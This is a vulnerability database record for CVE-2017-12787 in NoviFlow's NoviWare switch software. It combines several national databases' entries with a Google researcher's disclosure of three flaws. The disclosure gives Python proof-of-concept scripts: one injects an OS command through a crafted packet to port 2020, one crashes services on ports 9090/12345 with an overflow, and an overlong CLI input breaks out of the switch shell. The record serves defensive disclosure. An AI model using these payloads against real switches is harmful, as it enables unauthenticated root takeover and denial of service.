ID

VAR-201708-1147


CVE

CVE-2017-12787


TITLE

NoviWare Buffer error vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2017-007315

DESCRIPTION

A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. NoviFlowNoviWareNW400.2.6 and previous versions and noviSwitch devices have a security vulnerability in the network interface of novi_process_manager_daemon. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities Introduction ========== NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices. CVEs ===== * CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) * CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) * CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Affected versions ============== NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed Author ====== FranASSois Goichon - Google Security Team CVE-2017-12784 ============== Remote code execution in novi_process_manager_daemon Summary ------------- The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow Reproduction ------------------ If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, 2020)) payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload) s.close() --- On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. CVE-2017-12785 ============== Cli breakout in novish Summary ------------- The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root. Reproduction ------------------ Log in to the appliance via SSH and run the following command from the CLI: -- noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -- If the appliance is vulnerable, the cli crashes and the session ends. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. - A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services - These network services are prone to a stack-based buffer overflow when unpacking serialized values. Reproduction ------------------ If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, <9090 or 12345>)) payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload) s.read(1) s.close() --- A watchdog should restart the service if it has crashed. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Disclosure timeline =============== 2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure

Trust: 2.34

sources: NVD: CVE-2017-12787 // JVNDB: JVNDB-2017-007315 // CNVD: CNVD-2017-29534 // VULMON: CVE-2017-12787 // PACKETSTORM: 143818

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2017-29534

AFFECTED PRODUCTS

vendor:noviflowmodel:noviwarescope:lteversion:400.2.6

Trust: 1.0

vendor:noviflowmodel:noviwarescope:lteversion:nw400.2.6

Trust: 0.8

vendor:noviflowmodel:noviware <=nw400.2.6scope: - version: -

Trust: 0.6

vendor:noviflowmodel:noviwarescope:eqversion:400.2.6

Trust: 0.6

sources: CNVD: CNVD-2017-29534 // JVNDB: JVNDB-2017-007315 // CNNVD: CNNVD-201708-457 // NVD: CVE-2017-12787

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-12787
value: CRITICAL

Trust: 1.0

NVD: CVE-2017-12787
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2017-29534
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201708-457
value: CRITICAL

Trust: 0.6

VULMON: CVE-2017-12787
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2017-12787
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2017-29534
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2017-12787
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2017-29534 // VULMON: CVE-2017-12787 // JVNDB: JVNDB-2017-007315 // CNNVD: CNNVD-201708-457 // NVD: CVE-2017-12787

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.8

sources: JVNDB: JVNDB-2017-007315 // NVD: CVE-2017-12787

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201708-457

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-201708-457

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-007315

EXPLOIT AVAILABILITY

sources: VULMON: CVE-2017-12787

PATCH

title:NoviWareurl:https://noviflow.com/products/noviware/

Trust: 0.8

title:Patch for NoviFlowNoviWare and NoviSwitch device remote code execution vulnerabilitiesurl:https://www.cnvd.org.cn/patchInfo/show/103387

Trust: 0.6

sources: CNVD: CNVD-2017-29534 // JVNDB: JVNDB-2017-007315

EXTERNAL IDS

db:NVDid:CVE-2017-12787

Trust: 3.2

db:EXPLOIT-DBid:42518

Trust: 3.1

db:JVNDBid:JVNDB-2017-007315

Trust: 0.8

db:EXPLOITDBid:42518

Trust: 0.6

db:CNVDid:CNVD-2017-29534

Trust: 0.6

db:CNNVDid:CNNVD-201708-457

Trust: 0.6

db:VULMONid:CVE-2017-12787

Trust: 0.1

db:PACKETSTORMid:143818

Trust: 0.1

sources: CNVD: CNVD-2017-29534 // VULMON: CVE-2017-12787 // JVNDB: JVNDB-2017-007315 // PACKETSTORM: 143818 // CNNVD: CNNVD-201708-457 // NVD: CVE-2017-12787

REFERENCES

url:https://www.exploit-db.com/exploits/42518/

Trust: 3.2

url:https://nvd.nist.gov/vuln/detail/cve-2017-12787

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12787

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/119.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-12785

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-12786

Trust: 0.1

sources: CNVD: CNVD-2017-29534 // VULMON: CVE-2017-12787 // JVNDB: JVNDB-2017-007315 // PACKETSTORM: 143818 // CNNVD: CNNVD-201708-457 // NVD: CVE-2017-12787

CREDITS

Francois Goichon

Trust: 0.1

sources: PACKETSTORM: 143818

SOURCES

db:CNVDid:CNVD-2017-29534
db:VULMONid:CVE-2017-12787
db:JVNDBid:JVNDB-2017-007315
db:PACKETSTORMid:143818
db:CNNVDid:CNNVD-201708-457
db:NVDid:CVE-2017-12787

LAST UPDATE DATE

2025-04-20T23:04:26.294000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2017-29534date:2017-10-11T00:00:00
db:VULMONid:CVE-2017-12787date:2017-08-29T00:00:00
db:JVNDBid:JVNDB-2017-007315date:2017-09-19T00:00:00
db:CNNVDid:CNNVD-201708-457date:2017-08-23T00:00:00
db:NVDid:CVE-2017-12787date:2025-04-20T01:37:25.860

SOURCES RELEASE DATE

db:CNVDid:CNVD-2017-29534date:2017-10-11T00:00:00
db:VULMONid:CVE-2017-12787date:2017-08-22T00:00:00
db:JVNDBid:JVNDB-2017-007315date:2017-09-19T00:00:00
db:PACKETSTORMid:143818date:2017-08-18T23:44:44
db:CNNVDid:CNNVD-201708-457date:2017-08-11T00:00:00
db:NVDid:CVE-2017-12787date:2017-08-22T17:29:00.270